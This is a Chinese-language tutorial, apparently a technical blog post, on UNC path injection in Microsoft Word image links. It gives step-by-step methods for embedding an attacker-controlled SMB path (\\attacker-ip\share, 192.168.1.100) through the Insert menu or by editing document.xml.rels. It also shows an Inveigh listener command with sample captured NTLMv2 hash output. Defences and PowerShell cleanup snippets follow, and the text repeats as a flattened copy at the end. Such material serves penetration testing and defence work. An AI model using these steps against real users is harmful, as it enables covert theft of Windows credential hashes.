利用Microsoft Word中的图像链接进行UNC路径注入渗透
字数 1021 2025-08-18 11:37:02

Microsoft Word UNC路径注入渗透技术详解

技术概述

UNC路径注入是一种利用Microsoft Word文档中图像链接功能来获取NetNTLM哈希的攻击技术。当受害者打开包含恶意UNC路径链接的Word文档时,系统会自动尝试访问攻击者控制的SMB共享,从而泄露用户的NTLMv2哈希凭证。

攻击原理

  1. UNC路径:通用命名约定路径(\server\share)用于访问网络资源
  2. NetNTLM哈希:Windows身份验证过程中传输的凭证哈希
  3. 自动解析:Word会自动解析文档中的所有链接,包括图像链接

所需工具

  • Burp Suite Pro:用于协作客户端验证
  • Inveigh/Responder:用于捕获NetNTLM哈希
  • 7zip:用于修改Word文档内部结构

攻击步骤详解

方法一:通过Word界面插入恶意链接

  1. 打开Word文档,进入"插入"选项卡
  2. 点击"图片"图标
  3. 在文件名输入框中输入恶意UNC路径(如\\attacker-ip\share\image.png)
  4. 从"插入"下拉菜单中选择"链接到文件"
  5. 调整图像大小和布局以提高隐蔽性
  6. 保存文档

方法二:直接修改Word文档内部结构

  1. 使用7zip打开.docx文件(直接作为压缩包处理)
  2. 导航至word/_rels/document.xml.rels文件
  3. 修改Target属性为攻击者的UNC路径(如Target="file:///\\192.168.1.100\share\image.png")
  4. 保存修改并更新到.docx文件中

捕获哈希

  1. 在攻击机器上启动Responder或Inveigh监听: 
    PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2
  2. 等待受害者打开文档,捕获NTLMv2哈希: 
    2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3(DESKTOP-2QRDJR2): Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000

防御措施

  1. 网络层防御

    • 限制出站SMB流量(端口445/TCP)
    • 启用SMB签名

  2. 系统层防御

    • 配置组策略禁用NTLMv1
    • 启用SMBv3加密

  3. 用户教育

    • 不要打开来源不明的Word文档
    • 注意文档中的异常图像或链接

  4. 技术控制

    • 使用Office受保护的视图
    • 启用宏安全设置

高级技术:使用PowerShell枚举和修改Word关联

枚举文档关联目标

$file = "C:\path\to\doc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($file)
$xml = New-Object System.XML.XMLDocument
$xml = $doc.WordOpenXML
$targets = $xml.package.part.xmlData.Relationships.Relationship
$targets | Format-Table
$word.Quit()

使用OpenXML库安全枚举(不触发请求)

[System.Reflection.Assembly]::LoadFrom("C:\DocumentFormat.OpenXml.dll")
$file = "C:\path\to\doc.docx"
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets
$doc.Close()

删除恶意关联

$doc.MainDocumentPart.DeleteExternalRelationship("rId4")

总结

UNC路径注入攻击利用了Word文档处理外部资源的特性,具有高度隐蔽性,因为攻击会在用户无感知的情况下自动完成。防御需要多层次的安全措施,包括网络控制、系统加固和用户教育。

Microsoft Word UNC路径注入渗透技术详解 技术概述 UNC路径注入是一种利用Microsoft Word文档中图像链接功能来获取NetNTLM哈希的攻击技术。当受害者打开包含恶意UNC路径链接的Word文档时,系统会自动尝试访问攻击者控制的SMB共享,从而泄露用户的NTLMv2哈希凭证。 攻击原理 UNC路径 :通用命名约定路径(\\server\share)用于访问网络资源 NetNTLM哈希 :Windows身份验证过程中传输的凭证哈希 自动解析 :Word会自动解析文档中的所有链接,包括图像链接 所需工具 Burp Suite Pro :用于协作客户端验证 Inveigh/Responder :用于捕获NetNTLM哈希 7zip :用于修改Word文档内部结构 攻击步骤详解 方法一:通过Word界面插入恶意链接 打开Word文档,进入"插入"选项卡 点击"图片"图标 在文件名输入框中输入恶意UNC路径(如 \\attacker-ip\share\image.png ) 从"插入"下拉菜单中选择"链接到文件" 调整图像大小和布局以提高隐蔽性 保存文档 方法二:直接修改Word文档内部结构 使用7zip打开.docx文件(直接作为压缩包处理) 导航至 word/_rels/document.xml.rels 文件 修改Target属性为攻击者的UNC路径(如 Target="file:///\\192.168.1.100\share\image.png" ) 保存修改并更新到.docx文件中 捕获哈希 在攻击机器上启动Responder或Inveigh监听: 等待受害者打开文档,捕获NTLMv2哈希: 防御措施 网络层防御 : 限制出站SMB流量(端口445/TCP) 启用SMB签名 系统层防御 : 配置组策略禁用NTLMv1 启用SMBv3加密 用户教育 : 不要打开来源不明的Word文档 注意文档中的异常图像或链接 技术控制 : 使用Office受保护的视图 启用宏安全设置 高级技术:使用PowerShell枚举和修改Word关联 枚举文档关联目标 使用OpenXML库安全枚举(不触发请求) 删除恶意关联 总结 UNC路径注入攻击利用了Word文档处理外部资源的特性,具有高度隐蔽性,因为攻击会在用户无感知的情况下自动完成。防御需要多层次的安全措施,包括网络控制、系统加固和用户教育。